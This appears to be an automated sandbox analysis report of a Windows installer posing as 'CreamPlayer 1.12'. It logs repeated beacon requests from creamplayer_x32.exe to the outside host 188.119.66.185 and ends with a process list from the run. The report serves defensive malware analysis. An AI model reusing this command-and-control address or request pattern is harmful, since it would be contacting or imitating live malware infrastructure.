                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:08:50 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  8192.168.2.949904188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:08:51 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:08:52 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:08:52 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:08:52 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  9192.168.2.949910188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:08:54 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:08:55 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:08:54 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:08:55 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  10192.168.2.949913188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:08:56 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:08:57 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:08:57 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:08:57 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  11192.168.2.949919188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:08:59 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:00 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:08:59 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:00 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  12192.168.2.949925188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:09:01 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:02 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:09:02 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:02 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  13192.168.2.949931188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:09:04 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:04 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:09:04 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:04 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  14192.168.2.949939188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:09:06 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:07 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:09:06 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:07 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  15192.168.2.949946188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:09:08 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:09 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:09:09 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:09 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  16192.168.2.949952188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:09:11 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:11 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:09:11 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:11 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  17192.168.2.949958188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:09:13 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:14 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:09:14 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:14 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  18192.168.2.949966188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:09:16 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:17 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:09:16 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:17 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  19192.168.2.949972188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:09:18 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:19 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:09:19 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:19 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  20192.168.2.949978188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:09:20 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:21 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:09:21 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:21 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  21192.168.2.949984188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:09:23 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:24 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:09:23 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:24 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  22192.168.2.949990188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:09:25 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:26 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:09:26 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:26 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  23192.168.2.949996188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:09:27 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:28 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:09:28 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:28 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  24192.168.2.949999188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:09:30 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:31 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:09:30 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:31 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  25192.168.2.950000188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:09:32 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:33 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:09:33 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:33 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  26192.168.2.950001188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:09:35 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:35 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:09:35 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:35 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  27192.168.2.950002188.119.66.1854437420C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-14 13:09:37 UTC291OUTGET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                  Host: 188.119.66.185
                                                                                                  2024-12-14 13:09:38 UTC200INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Sat, 14 Dec 2024 13:09:38 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  2024-12-14 13:09:38 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: e8b723663ec13250


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:08:07:31
                                                                                                  Start date:14/12/2024
                                                                                                  Path:C:\Users\user\Desktop\bzX2pV3Ybw.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\bzX2pV3Ybw.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:4'096'896 bytes
                                                                                                  MD5 hash:CD6081E11EB60ABFA77C3B587726D83F
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:false

                                                                                                  Target ID:2
                                                                                                  Start time:08:07:31
                                                                                                  Start date:14/12/2024
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp" /SL5="$103F2,3847834,56832,C:\Users\user\Desktop\bzX2pV3Ybw.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:706'560 bytes
                                                                                                  MD5 hash:726BF37850FF846984004440C4875481
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000002.00000002.2615859333.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:false

                                                                                                  Target ID:3
                                                                                                  Start time:08:07:32
                                                                                                  Start date:14/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\net.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\system32\net.exe" pause cream_player_12135
                                                                                                  Imagebase:0x470000
                                                                                                  File size:47'104 bytes
                                                                                                  MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:4
                                                                                                  Start time:08:07:33
                                                                                                  Start date:14/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff70f010000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:08:07:33
                                                                                                  Start date:14/12/2024
                                                                                                  Path:C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe" -i
                                                                                                  Imagebase:0x400000
                                                                                                  File size:4'668'655 bytes
